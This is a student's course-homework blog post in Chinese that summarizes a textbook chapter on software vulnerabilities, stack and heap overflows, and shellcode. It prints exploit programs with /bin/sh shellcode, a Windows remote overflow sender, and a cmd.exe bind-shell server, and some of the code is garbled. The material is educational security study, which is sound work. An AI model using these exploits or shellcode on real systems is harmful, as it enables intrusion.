• 20199315 2019-2020-2 《网络攻防实践》第10周作业


    20199315 2019-2020-2 《网络攻防实践》第10周作业

    前言

    这个作业属于哪个课程:https://edu.cnblogs.com/campus/besti/19attackdefense

    这个作业的要求在哪里:https://edu.cnblogs.com/campus/besti/19attackdefense/homework/10723

    我在这个课程的目标是:学习网络攻防相关知识,提升专业技能

    这个作业在哪个具体方面帮助我实现目标:学习了解恶意代码基础知识和分析方法

    知识点梳理与总结————《网络攻防技术与实践》教材第十章(P381)

    软件安全概述

    攻击者能够轻易地对系统和网络实施攻击,很大程度是因为安全漏洞在软件中的大规模存在,攻击者可以利用这些漏洞来违背系统和网络的安全属性。

    大多数成功攻击都是利用和破解已公布但未被修补的软件安全漏洞或不安全的软件配置,而这些安全漏洞不可避免地大量存在于日趋复杂化、更加可扩展和可交互,以及在互联网络中互相连通的各类软件之中。

    安全漏洞(Vulnerability):在系统安全流程、设计、实现或内部控制中所存在的缺陷或弱点,能够被攻击者所利用并导致安全侵害或对系统安全策略的违反。

    安全漏洞的基本元素

    • 系统的脆弱性或缺陷

    • 攻击者对缺陷的可访问性

    • 攻击者对缺陷的可利用性

    安全漏洞的范畴

    • 软件安全漏洞(目前最常见,也是影响范围最大的安全漏洞类型)

    • 硬件、个人与组织管理中存在的、能够被攻击者利用来破坏安全策略的弱点

    软件安全困境的原因:复杂性、可扩展性和连通性,软件三个要素共同作用

    • 软件安全漏洞类型

      • 内存安全违规类:内存安全违规类漏洞是在软件开发过程中在处理RAM内存访问时所引入的安全缺陷,如缓冲区漏洞溢出和Double Free、Use-after-Free等不安全指针问题等。不安全指针是指在计算机程序中存在的并没有指向适当类型对象的非法指针,在对这些指针进行引用时,往往会发生一些不可预期的后果,导致程序内存访问错误。

      • 输入验证类:输入验证类安全漏洞是指软件程序在对用户输入进行数据验证存在的错误,没有保证输入数据的正确性、合法性和安全性,从而导致可能被恶意攻击与利用。输入验证类安全漏洞根据输入位置、恶意输入内容被软件程序的使用方式的不同,又包含格式化字符串、SQL注入、代码注入、远程文件包含、目录遍历、XSS、HTTP Header注入、HTTP响应分割错误等多种安全漏洞技术形式。

      • 竞争条件类:竞争条件类缺陷是系统或进程中一类比较特殊的错误,通常在涉及多进程或多线程处理的程序中出现,是指处理进程的输出或者结果无法预测,并依赖于其他进程事件发生的次序或时间时,所导致的错误。

      • 权限混淆与提升类:权限混淆与提升类漏洞是指计算机程序由于自身编程疏忽或被第三方欺骗,从而滥用其权限,或赋予第三方不该给予的权限。具体技术形式主要有:Web应用程序中的跨站请求伪造(CSRF)、Clickjacking、FTP反弹攻击、权限提升、“越狱”(jailbreak)等。

    缓冲区溢出基础概念

    缓冲区溢出基本概念:缓冲区溢出是计算机程序中存在的一类内存安全违规类漏洞,在计算机程序向特定缓冲区内填充数据时,超出了缓冲区本身的容量,导致外溢数据覆盖了相邻内存空间的合法数据,从而改变程序执行流程破坏系统运行完整性。

    缓冲区溢出攻击发生的根本原因:现代计算机系统的基础架构——冯 ● 诺伊曼体系存在本质的安全缺陷,即采用了“存储程序”的原理,计算机程序的数据和指令都在统一内存中进行存储,而没有严格的分离。这一缺陷使得攻击者可以将输入的数据,通过利用缓冲区溢出漏洞,覆盖修改程序在内存空间中与数据区相邻存储的关键指令,以达到使程序执行恶意注入指令的攻击目的。

    函数调用过程

    • 调用(call):调用者将函数调用参数、函数调用下一条指令的返回地址压栈,并跳转至被调用函数入口地址。

    • 序言(prologue): 被调用函数开始执行首先会进入序言阶段,将对调用函数的栈基址进行压栈保存,并创建自身函数的栈结构,具体包括将ebp寄存器赋值为当前栈基址,为本地函数局部变量分配栈地址空间,更新esp寄存器为当前栈顶指针等。

    • 返回(return): 被调用函数执行完功能将指令控制权返回给调用者之前,会进行返回阶段的操作,通常执行leave和ret指令,即恢复调用者的栈顶与栈底指针,并将之前压栈的返回地址装载至指令寄存器eip中,继续执行调用者在函数调用之后的下一条指令。

    
    #include <stdio.h>
    int func(int a, int b){
       int retVal = a+ b;
       printf("b: 0x%08x
    ",&b);
       printf("a: 0x%08x
    ",&a);
       printf("ret addr here: 0x%08x
    ",&a-1);
       printf("stored ebp here: 0x%08x
    ",&a-2);
       printf("retVal: 0x%08x
    
    ", &retVal);
       return retVal;
    }
    int main(int argc, char* argv[])
    {
       int result = func(1, 2);
       return 0;
    }
    
    

    缓冲区溢出漏洞的三种具体技术形态(根据缓冲区在进程内存空间中的位置不同分类):栈溢出、堆溢出和内核溢出。

    • 栈溢出:指存储在栈上的一些缓冲区变量由于存在缺乏边界保护问题,能够被溢出并修改栈上的敏感信息(通常是返回地址),从而导致程序流程的改变。
    • 堆溢出:存储在堆上的缓冲区变量缺乏边界保护所遭受溢出攻击的安全问题。
    • 内核溢出:存在于一些内核模块或程序中,是由于进程内存空间内核态中存储的缓冲区变量被溢出造成的。

    栈溢出代码

    
    以栈溢出为例的实例代码:
    #include <stdio.h>
    void return_input(void){
       char array[30];
       gets(array);
       printf("%s/n",array);
    }
    int main(void)
    {
       return_input();
       return 0;
    }
    
    

    Linux平台上的栈溢出与Shellcode

    Linux平台栈溢出攻击技术

    Linux平台中的栈溢出攻击按照攻击技术的构造方式不同,主要有NSR、RNS和RS三种模式。

    • NSR模式:主要适用于被溢出的缓冲区变量比较大,足以容纳Shellcode的情况,其攻击数据从低地址到高地址的构造方式是一堆Nop指令(即空操作指令)之后填充Shellcode,再加上一些期望覆盖RET返回地址的跳转地址,从而构成了NSR攻击数据缓冲区。
    
    vulnerable1.c
    
    #include<stdio.h> 
    
    int main(int argc,char **argv){ 
       char buf[500]; 
       strcpy(buf,argv[1]); 
       printf("buf's 0x%8x
    ",&buf); 
       getchar();
       return 0; 
    } 
    
    
    
    stackexploit1.c
    
    #include<stdlib.h> 
    #include<string.h> 
    
    char shellcode[]= 
    // setreuid(0,0); 
    "x31xc0" // xor %eax,%eax 
    "x31xdb" // xor %ebx,%ebx 
    "x31xc9" // xor %ecx,%ecx 
    "xb0x46" // mov $0x46,%al 
    "xcdx80" // int $0x80 
    // execve /bin/sh 
    "x31xc0" // xor %eax,%eax 
    "x50" // push %eax 
    "x68x2fx2fx73x68" // push $0x68732f2f 
    "x68x2fx62x69x6e" // push $0x6e69622f 
    "x89xe3" // mov %esp,%ebx 
    "x8dx54x24x08" // lea 0x8(%esp,1),%edx 
    "x50" // push %eax 
    "x53" // push %ebx 
    "x8dx0cx24" // lea (%esp,1),%ecx 
    "xb0x0b" // mov $0xb,%al 
    "xcdx80" // int $0x80 
    // exit(); 
    "x31xc0" // xor %eax,%eax 
    "xb0x01" // mov $0x1,%al 
    "xcdx80"; // int $0x80 
    
    unsigned long get_esp(){ 
       __asm__("movl %esp,%eax"); 
    
    } 
    
    int main(int argc,char *argv[]){ 
       char buf[530]; 
       char* p; p=buf; 
       int i; unsigned long ret; 
       int offset=0; 
    
       /* offset=400 will success */ 
       if(argc>1) offset=atoi(argv[1]); 
       ret=get_esp()-offset; 
       memset(buf,0x90,sizeof(buf));     #把整个BUF填满NOPS 
       memcpy(buf+524,(char*)&ret,4);       #把EIP用我们的RET覆盖,让程序跳转到NOPS里面
       memcpy(buf+i+100,shellcode,strlen(shellcode));    #从BUF[100]开始填充SHELLCODE,前面和后面都是NOPS 当然可以增大NOPS的数目
       printf("ret is at 0x%8x
     esp is at 0x%8x
    ",
    	   ret,get_esp()); 
       execl("./vulnerable1","vulnerable1",buf,NULL);      #执行漏洞程序
       return 0; 
    } 
    
    
    • RNS模式:一般用于被溢出的变量比较小,不足以容纳Shellcode的情况。攻击数据从低地址到高地址的构造方式是首先填充一些期望覆盖RET返回地址的跳转地址,然后是一堆Nop指令填充出“着陆区”,最后再是Shellcode。在溢出攻击之后,攻击数据将在RET区段即溢出了目标漏洞程序的小缓冲区,并覆盖了栈中的返回地址,然后跳转至Nop指令所构成的“着陆区”",并最终执行Shellcode。
    
    vulnerable2.c
    
    #include<stdio.h> 
    int main(int argc,char **argv){ 
       char buf[10]; 
       strcpy(buf,argv[1]); 
       printf("buf's 0x%8x
    ",&buf); 
       getchar();
       return 0; 
    } 
    
    
    
    stackexploit2.c
    
    #这里显示与上面有区别的main函数部分
    int main(int argc,char **argv){ 
       char buf[500];       #分配一个500BYTES的大BUF,用于我们的构造把整个BUFFER填满NOPS
       unsigned long ret,p; 
       int i; 
    
       p=&buf; 
       ret=p+70; 
    
       memset(buf,0x90,sizeof(buf));    #用前44BYTES填满RET
    
       for(i=0;i<44;i+=4) 
          *(long *)&buf[i]=ret; 
    
       memcpy(buf+400+i,shellcode,strlen(shellcode));    #把SHELLCODE复制到合适的位置
    
       execl("./vulnerable2","vulnerable2",buf,NULL);    #执行漏洞程序
    
       return 0; 
    } 
    
    
    • RS模式:在这种模式下能够精确地定位出Shellcode在目标漏洞程序进程空间中的起始地址,因此也就无须引入Nop空指令构建“着陆区”。这种模式是将Shellcode 放置在目标漏洞程序执行时的环境变量中,由于环境变量是位于Linux进程空间的栈底位置,因而不会受到各种变量内存分配与对齐因素的影响,其位置是固定的,可以通过如下公式进行计算:ret = 0xc0000000 - sizeof(void *) - sizeof(FILENAME) - sizeof(Shellcode)
    
    stackexploit3.c
    
    
    #这里给出不同的main函数部分
    int main(int argc,char **argv){ 
       char buf[32]; 
       char *p[]={"./vulnerable2",buf,NULL};    
       char *env[]={"HOME=/root",shellcode,NULL}; #把SHELLCODE放入将要执行的环境变量中
       unsigned long ret; 
       ret=0xc0000000-strlen(shellcode)-strlen("./vulnerable2")-sizeof(void *); 
    
       memset(buf,0x41,sizeof(buf));     #把整个BUF用A填满
       memcpy(&buf[28],&ret,4);         #计算RET的值,并覆盖EIP
    
       printf("ret is at 0x%8x
    ",ret); 
       execve("./vulnerable2", "/vulnerable2", buf, env);   #执行漏洞程序
    
       return 0; 
    } 
    
    

    Linux平台上的远程栈溢出攻击和本地栈溢出攻击原理相同,区别为:

    • 用户输入传递的途径不同:本地栈溢出的用户输入传递途径主要为argv命令行输入、文件输入等,远程栈溢出的用户输入传递途径则是通过网络。

    • Shellcode的便携方式不同:本地栈溢出攻击中的Shellcode主要会包含提升至较当前运行用户权限更高的权限,并给出本地Shell访问,而远程栈溢出攻击的Shellcode则需要将Shell访问与网络连接起来,给出一个远程的Shell访问。

    NSR和RNS模式也都适用于远程栈溢出攻击,RS模式只能用于本地缓冲区溢出攻击。

    Linux平台的Shellcode实现技术

    Shellcode是一段机器指令,对于我们通常接触的IA32架构平台,Shellcode就是符合Intel 32位指令规范的一串CPU指令,被用于溢出之后改变系统正常流程,转而执行Shellcode以完成渗透测试者的攻击目的,通常是为他提供一个访问系统的本地或远程命令访问(即Shell)。

    Linux本地Shellcode实现机制

    Linux系统本地Shellcode通常提供的功能就是为攻击者启动一个命令行Shell。一般通过execve()函数启动/bin/sh提供命令行。

    • 先用高级编程语言,通常用C,来编写Shellcode 程序

    • 编译并反汇编调试这个Shellcode程序

    • 从汇编语言代码级别分析程序执行流程

    • 整理生成的汇编代码,尽量减小它的体积并使它可注入,并可通过嵌入C语言进行运行测试和调试

    • 提取汇编代码所对应的opcode二进制指令,创建Shellcode指令数组。

    Linux远程Shellcode实现机制

    Linux系统上的远程Shellcode的实现原理与本地Shellcode完全一致,实现方法步骤也跟本地Shellcode一致。但是Linux远程Shellcode需要让攻击目标程序创建socket监听指定的端口等待客户端连接,启动一个命令行Shell,并将命令行的输入输出与socket绑定。

    Windows平台上的栈溢出与Shellcode

    Windows平台栈溢出攻击技术机理

    Windows操作系统与Linux操作系统在栈溢出漏洞方面的差异

    • 对程序运行过程中废弃栈的处理方式差异

    Windows平台会向废弃栈中写入一些随机的数据,而Linux则不会进行任何的处理。Windows系统在调用完成函数之后,会对废弃栈进行处理,从而破坏了在溢出缓冲区中保存的Shellcode,即使成功进行了渗透攻击覆盖了栈中的返回地址,但覆盖返回地址所指向的Shellcode已经失效,这样就无法执行攻击者指定的指令达成攻击目的

    • 进程内存空间的布局差异

    Linux进程内存空间中栈底指针在0xc0000000之下,即一般栈中变量的位置都在0xf地址附近,在这些地址中没有空字节。Windows 平台的栈位置处于0x00FFFFFF 以下的用户内存空间,一般为0x0012地址附近,而这些内存地址的首字节均为0x00 空字节。我们在栈中植入Shellcode的起始位置,即要覆盖原先返回地址的跳转地址肯定也拥有空字节,此时我们所构造出来的“RNS"模式攻击数据中在“R"的位置上就存在着空字节,而这样的攻击数据在漏洞程序中的一些字符串拷贝和操作函数中将被截断,丢弃掉空字节之后的nop和Shellcode,致使无法成功地进行溢出攻击。

    在Windows平台上也没有Linux平台上通过SUID/SGID程序能够提升当前用户执行权限的机制。

    • 系统功能调用的实现方式差异

    Linux系统中通过“int80”中断处理来调用系统功能,而Windows系统则是通过操作系统中更为复杂的API及内核处理例程调用链来完成系统功能调用,对应用程序直接可见的是应用层中如Kernel32.dll、User32.dIl 等系统动态链接库中导出的一些系统API接口函数。

    windows下攻击远程栈溢出攻击代码

    
    #include <winsock2.h>
    #include <stdio.h>
    #progma comment(lib,"ws2_32")
    
    char Buff[1024];
    void overflow(char * s, int size)
    {
            char s1[50];
            printf("receive %d bytes",size);
            s[size]=0;
            strcpy(s1,s);
    }
    int main()
    {
            WSADATA wsa;
            SOCKET sockFD;
            char Buff[1024],*sBO;
    
            WSAStartup(MAKEWORD(2,2),&wsa);
    
            sockFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    
            struct sockaddr_in server;
    
            server.sin_family = AF_INET;
            server.sin_port = htons(3764);
            server.sin_addr.s_addr=inet_addr("127.0.0.1");
    
            connect(sockFD,(struct sockaddr *)&server,sizeof(server));
            for(int i=0;i<56;Buff[i++]=0x90);
            strcpy(Buff+56,(char *)eip);
            strcpy(Buff+60,(char *)sploit);
            sBO = Buff;
            send(sockFD,sBO,56+4+560,0);
    
            closesocket(sockFD);
            WSACleanup();
            return 1;
    
    }
    
    

    Windows平台Shellcode实现技术

    Windows本地Shellcode

    在Windows平台上,典型的本地Shellcode同样也是启动一个命令行Shell,即“command.com”或“cmd.exe”,Windows32的系统API中提供了system()函数调用,可以用于启动指定程序或运行特定命令,在调用system(“command.com”)之后即可启动命令行程序。

    在Windows平台上Shellcode的编写过程中,可以使用Kernel32.dll中的LoadLibrary和GetProcAddress()函数来装载其他所需的函数,并查询获得函数入口地址。

    对于较早版本的Windows操作系统而言,这两个函数所在的Kernel32.dll链接库都会被映射至目标程序进程空间的相同位置,同时它们的函数入口也是相对固定的,因此我们可以在Shellcode中采用硬编码函数地址,但是这种方法实现的Shellcode只能用于特定的Windows版本。

    为构建更具通用性的Shellcode,有一种动态搜索Kernel32.dll内存空间以获取函数入口地址的方法,首先通过进程环境块(PEB)的结构分析获取Kernel32.dll加载基址,然后从这个DLL的导出函数表中通过函数名称查询获得所需函数的入口地址。

    C语言版的Windows本地Shellcode程序:

    使用LoadLibrary()函数加载msvert.dll动态链接库,通过GetProcAddress()函数获得system函数的加载入口地址,赋值给ProcAdd函数指针,然后通过函数指针调用system()函数,启动命令行Shell,最后还要调用exit()退出当前进程。

    
    #include <windows.h>
    #include <winbase.h>
    typedef void (*MYPROC)(LPTSTR);
    typedef void (*MYPROC2)(int);
    int main()
    {
            HINSTANCE LibHandle;
            MYPROC ProcAdd;
            MYPROC2 ProcAdd2;
            char dllbuf[11]  = "msvcrt.dll";
            char sysbuf[7] = "system";
            char cmdbuf[16] = "command.com";
            char sysbuf2[5] = "exit";
            LibHandle = LoadLibrary(dllbuf);
            ProcAdd = (MYPROC)GetProcAddress(
    			LibHandle, sysbuf);
            (ProcAdd) (cmdbuf);
    
            ProcAdd2 = (MYPROC2) GetProcAddress(
    			LibHandle, sysbuf2);
    		(ProcAdd2)(0);
    }
    
    

    转化为Opcode硬编码的shellcode:

    
    mov esp,ebp               
        push ebp              
        mov ebp,esp               
        xor edi,edi                 
        push edi                
    
        sub esp,08h                 
    
        mov byte ptr [ebp-0ch],63h  
        mov byte ptr [ebp-0bh],6fh  
        mov byte ptr [ebp-0ah],6dh  
        mov byte ptr [ebp-09h],6Dh  
        mov byte ptr [ebp-08h],61h  
        mov byte ptr [ebp-07h],6eh  
        mov byte ptr [ebp-06h],64h  
        mov byte ptr [ebp-05h],2Eh  
        mov byte ptr [ebp-04h],63h  
        mov byte ptr [ebp-03h],6fh  
        mov byte ptr [ebp-02h],6dh  
        lea eax,[ebp-0ch]           
        push eax                    
        mov eax, 0x77bf8044         
        call eax 
    
    

    Windows远程Shellcode

    • 创建一个服务器端socket,并在指定的端口上监听;

    -通过accept()接受客户端的网络连接:

    -创建子进程,运行“cmd.exe",启动命令行;

    • 创建两个管道,命令管道将服务器端socket接收(recv) 到的客户端通过网络输入的执行命令,连接至cmd.exe的标准输入:然后输出管道将cmd.exe的标准输出连接公服务器端socket的发送( send),通过网络将运行结果反馈给客户端。
    
    #include <winsock2.h>
    #include <stdio.h>
    
    int main()
    {
        WSADATA wsa;
        SOCKET listenFD;
        char Buff[1024];
        int ret;
    
        WSAStartup(MAKEWORD(2,2),&wsa);
    
        listenFD = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
    
        struct sockaddr_in server;
    
        server.sin_family = AF_INET;
        server.sin_port = htons(53764);
        server.sin_addr.s_addr=ADDR_ANY;
        ret=bind(listenFD,(sockaddr *)&server,sizeof(server));
        ret=listen(listenFD,2);
        int iAddrSize = sizeof(server);
        SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);
    
        SECURITY_ATTRIBUTES sa;
        sa.nLength=12;sa.lpSecurityDescriptor=0;sa.bInheritHandle=true;
        HANDLE hReadPipe1,hWritePipe1,hReadPipe2,hWritePipe2;
    
        ret=CreatePipe(&hReadPipe1,&hWritePipe1,&sa,0);
        ret=CreatePipe(&hReadPipe2,&hWritePipe2,&sa,0);
    
        STARTUPINFO si;
        ZeroMemory(&si,sizeof(si));
        si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
        si.wShowWindow = SW_HIDE;
        si.hStdInput = hReadPipe2;
        si.hStdOutput = si.hStdError = hWritePipe1;
        char cmdLine[] = "cmd.exe";
        PROCESS_INFORMATION ProcessInformation;
    
        ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);
    
        unsigned long lBytesRead;
        while(1) {
        ret=PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);
            if(lBytesRead) {
                ret=ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0);
            if(!ret) break;
                ret=send(clientFD,Buff,lBytesRead,0);
            if(ret<=0) break;
            }else {
                lBytesRead=recv(clientFD,Buff,1024,0);
                if(lBytesRead<=0) break;
                    ret=WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0);
                if(!ret) break;
                    }
            }
        return 0;
    }
    
    

    堆溢出攻击

    堆溢较栈溢出具有更高的难度,最重要的原因在于堆中并没有可以直接覆盖并修改指令寄存器指针的返回地址,因此往往需要利用在堆中一些会影响程序执行流程的关键变量,如函数指针、C++类对象中的虚函数表,或者挖掘出堆中进行数据操作时可能存在的向指定内存地址改写内容的漏洞机会。

    
    #define ERROR -1 	 
    #define BUFSIZE 16 	
    int goodfunc(const char *str) 	 
    { 	 
    	printf("
    Hi, I'm a good function. I was called through funcptr.
    "); 	 
    	printf("I was passed: %s
    ", str); 	 
    	return 0; 	 
    }
    int main(int argc, char **argv) 
    { 	 
    	static char buf[BUFSIZE]; 	 
     	static int (*funcptr)(const char *str); 	 
    	if (argc <= 2) 	 
    	{ 	 
    		fprintf(stderr, "Usage: %s <buffer> <goodfunc's arg>
    ", argv[0]); 	 
    		exit(ERROR);
    	}
    	printf("system()'s address = %p
    ", &system); 	 
    	funcptr = (int(*)(const char *str))goodfunc; 
    	printf("before overflow: funcptr points to %p
    ", funcptr); 	 
    	memset(buf, 0, sizeof(buf)); 
    	strncpy(buf, argv[1], strlen(argv[1])); 
    	printf("after overflow: funcptr points to %p
    ", funcptr); 	 
    	(void)(*funcptr)(argv[2]); 
    	return 0; 
    } 
    
    

    函数指针改写:

    需要被溢出的缓冲区临近函数指针存储地址,且在其低地址方向。

    在符合这种变量布局的条件下,当向缓冲区填充数据时,如果没有边界判断和控制的话,那么缓冲区溢出之后就会自然地覆盖函数指针所在的内存区,从而改写函数指针的指向地址,攻击者只要能够将该函数指针指向恶意构造的Shellcode入口地址,在程序使用函数指针调用原先期望的函数时,就会转而执行Shellcode。

    C++类对象虚函数表改写:C++类通过虚函数提供了一种Late binding运行过程绑定的机制,编译器为每个包含虚函数的类建立起虚函数表( vtable)、存放虚函数的地址,并在每个类对象的内存区中放入一个指向虚函数表的指针,通常称为虚函数指针vptr.对于使用了虚函数机制的C++类,如果它的类成员变量中存在可被溢出的缓冲区,那么就可以进行堆溢出攻击,通过覆盖类对象的虚函数指针,使其指向一个特殊构造的虚函数表,从而转向执行攻击者恶意注入的指令。

    
    #include <iostream>
    
    class A
    {
        private:
            char str[11];
        public:
            void setBuffer(char * temp)
            {
                strcpy(str,temp);
            }
            virtual void printBuffer()
            {
                cout<<str<<endl;
            }
    };
    
    void main(int argc, char* argv[])
    {
        A *a;
        a = new A;
        a->setBuffer(argv[1]);
        a->printBuffer();
    }
    
    

    缓冲区溢出攻击的防御技术

    尝试杜绝溢出的防御技术:最根本的办法是编写正确的、不存在缓冲区溢出安全漏洞的软件代码;编写一些高级的查错程序,如fault injection等;通过Fuzz注入测试来寻找代码的安全漏洞,还有一些分析工具用于侦测缓冲区溢出漏洞是否存在;在编译器上引入针对缓冲区的边界保护检查机制。但不能完全地消除缓冲区溢出攻击的可能性。

    允许溢出但不让程序改变执行流程的防御技术:StackGuard技术、PointGuard、ProPolice、Stack Shield等技术;C++中的虚函数表指针、覆盖SEH异常处理结构等。

    无法让攻击代码执行的防御技术:A64、AMD64、Alpha等新的CPU硬件体系框架都引入对基于硬件NX保护机制,从硬件上支持对特定内存页设置成不可执行;各种操作系统也通过一些内核补丁或内建机制来支持堆栈不可执行,如Linux平台上的PaX堆栈不可执行内核补丁, Solaris/SPARC的栈不可执行保护、数据段不可执行内核补丁、Windows的DEP数据执行保护机制等。此外目前主流操作系统也普遍使用了ASLR内存地址布局随机化机制。

    思考感悟

    放假了,没有实践内容了,所以这次作业相对轻松了一些。_(:з」∠)_但是课本内容里出现了颇多代码,有空还需要多动手实践一下。

    参考资料


    此为本人网络攻防学习第十周的内容,如有不足,还请批评指正,不胜感激。

  • 相关阅读:
    C字符串格式化
    oms登录bug
    宏旺文章审核功能使用指引
    phpcms文章审核
    html5的pushState 无刷新, 前进后退等
    js路由—backbone的路由的实现02
    js路由—backbone的路由的实现01
    js路由—简单路由的实现
    img标签和css的background-image的区别
    querySelector与querySelectorAll
  • 原文地址:https://www.cnblogs.com/qianxiaoxu/p/12838888.html
Copyright © 2020-2023  润新知